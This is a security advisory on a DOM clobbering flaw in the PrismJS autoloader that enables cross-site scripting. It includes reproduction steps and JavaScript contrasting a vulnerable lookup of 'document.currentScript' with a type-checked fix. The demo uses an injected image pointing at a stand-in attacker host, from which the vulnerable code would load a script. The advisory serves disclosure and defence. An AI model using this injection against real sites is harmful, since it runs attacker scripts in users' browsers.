PrismJS DOM Clobbering Vulnerability Leading to Cross-Site Scripting
Vulnerability
A DOM clobbering vulnerability has been identified in PrismJS versions through 1.29.0. This issue allows for cross-site scripting (XSS) attacks in web pages that embed Prism and permit users to inject HTML elements without scripts, such as an image tag with a controlled name attribute. The vulnerability arises because the Prism autoloader plugin's use of 'document.currentScript' can be manipulated by attacker-injected HTML, leading to the execution of malicious scripts.
Impact
Exploitation of this vulnerability allows for cross-site scripting (XSS) attacks, where an attacker can inject and execute malicious scripts in the context of the user's browser.
Reproduction
To reproduce this vulnerability, embed a controlled image tag (no script element is needed) into a web page that uses PrismJS version 1.29.0. The image tag should carry a name attribute matching the property the Prism autoloader plugin reads; browsers expose named elements as properties on 'document', so the injected image shadows the 'currentScript' reference. When the page is loaded, the autoloader derives its base path from the clobbered element's 'src' instead of its own script, causing Prism to load a script from an attacker-controlled domain.
Remediation
Users are advised to update to the latest version of PrismJS, where this vulnerability has been addressed. For those using version 1.29.0, a manual patch is available by adding an additional type check when accessing 'document.currentScript' to ensure it only returns script elements.
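The following is an added illustration, not Prism's own code: a clobberable base-path lookup next to the type-checked version the advisory describes. A plain object stands in for 'document' so the logic runs under Node; the URLs and element objects are constructed.

```javascript
// Vulnerable pattern: trusts whatever document.currentScript returns.
// With <img name="currentScript" src="https://attacker.example/prism/x.png">
// in the page, the named element shadows the real property and `src`
// now points at the attacker's host.
function scriptBaseVulnerable(doc) {
  const el = doc.currentScript;
  if (el && el.src) {
    return el.src.replace(/[^/]+$/, ''); // strip the file name, keep the directory
  }
  return null;
}

// Hardened pattern: only accept a real <script> element. In a browser
// `el instanceof HTMLScriptElement` is the check to use; the tagName
// comparison is the fallback so the function also runs under Node, where
// that constructor does not exist. Named-property clobbering cannot produce
// a SCRIPT element, because <script> does not expose a name on document.
function scriptBaseHardened(doc) {
  const el = doc.currentScript;
  const isScript = typeof HTMLScriptElement !== 'undefined'
    ? el instanceof HTMLScriptElement
    : !!el && el.tagName === 'SCRIPT';
  if (isScript && typeof el.src === 'string' && el.src.length > 0) {
    return el.src.replace(/[^/]+$/, '');
  }
  return null; // caller should fall back to a configured path, never to el.src
}

// Builds the URL the autoloader would inject for a language component
// (components/prism-<lang>.min.js relative to the base path). Returns null
// when no trustworthy base path is available.
function componentUrl(doc, resolveBase, lang) {
  const base = resolveBase(doc);
  return base ? base + 'components/prism-' + lang + '.min.js' : null;
}

// Constructed stand-ins for `document` in a clean page and a clobbered page.
const cleanDoc = {
  currentScript: { tagName: 'SCRIPT', src: 'https://site.example/js/prism-autoloader.js' },
};
const clobberedDoc = {
  currentScript: { tagName: 'IMG', src: 'https://attacker.example/prism/x.png' },
};

console.log(componentUrl(clobberedDoc, scriptBaseVulnerable, 'bash')); // attacker host
console.log(componentUrl(clobberedDoc, scriptBaseHardened, 'bash'));   // null
```

Detection-wise, the same check is the thing to grep for in any inline copy of the autoloader: a bare read of 'document.currentScript' followed by use of its 'src' is the vulnerable shape.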